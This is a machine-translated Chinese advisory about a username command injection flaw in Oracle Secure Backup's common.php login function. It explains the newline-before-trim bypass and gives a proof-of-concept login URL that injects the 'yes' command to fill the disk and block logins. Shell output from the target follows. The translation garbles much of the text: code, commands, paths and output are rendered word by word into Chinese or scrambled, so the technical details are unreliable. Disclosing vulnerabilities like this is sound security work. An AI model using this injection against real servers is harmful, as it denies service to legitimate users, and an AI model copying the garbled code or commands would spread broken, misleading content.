(R1)甲骨文安全备份/ apache / htdocts / php /常见。php用户名参数远程代码执行

甲骨文安全备份包含一个缺陷,允许远程代码执行。这一缺陷存在,因为应用程序不验证用户名的参数被传递到之前“validate_login”功能/ apache / htdocts / php /常见。php脚本。这可能允许用户创建一个精雕细琢的URL将远程服务器上执行任意代码与web服务器的权限。

额外的技术细节:

的弱点在于validate_login ()的函数/ apache /根/ php / common.php。如果用户名提供给这个函数被认为是有效的,它将被传递给后续的调用exec_qr (),这会导致命令注入。请注意,validate_login ()做了一些努力防止命令注入:

273如果(strlen(用户名)> 128 | | preg_match (" / [^ a-zA-Z0-9。_ -)/”,削减(用户名)美元))
274年{
275美元status_msg[] =“错误:登录失败”;
276年返回false;
277}

功能只允许字母数字字符(+时间、下划线和破折号),可以防止大部分的正常壳注射字符串。然而,它调用修剪()在执行这种验证之前的用户名。提供的用户名会通过验证和导致命令注入。(第一个字符是一个换行符,而不是一个文字“\ n”)。例如:

\ ninjected-cmd

不幸的是,这严重限制了可以被注入必须符合上面的正则表达式。进一步,它意味着参数不能传递到注入命令。作为一个概念验证,注射是的命令可以导致拒绝服务条件。在登录过程中,记录输出到一个临时日志文件。如果是的命令注入,无穷无尽的“y被附加到这个日志文件,最终耗尽空间哪个分区上创建日志文件。这可以防止后续日志文件被创建,阻止其他用户登录。这可以通过以下网址:

https://[目标]/ login ?尝试= 1 uname = % 0是的

在目标系统上:

$ p ef | grep是的没有人11305 10485 0霎时一切都分/ 0就是sh - c是的:无效的选择————gui - u ?是的lsuser - s ?是的2 > & 1 |猫> / tmp /。LqMtP3没人11308年53分/ 0 00:00:03霎时一切都是的11305 ls lh / tmp /。LqMtP3 #临时文件,随机名称在这个格式- - - - - - - - 1没人没人3.4 g 1月14火灾/ tmp /。LqMtP3 df - h #美元几分钟后…文件系统大小使用效果使用%安装在/dev/mapper/VolGroup00-LogVol00 8.2 g / 7.7 g 0 100% /dev/sda1 25 99 70 26% / boot tmpfs /dev/shm 506 0 506 0%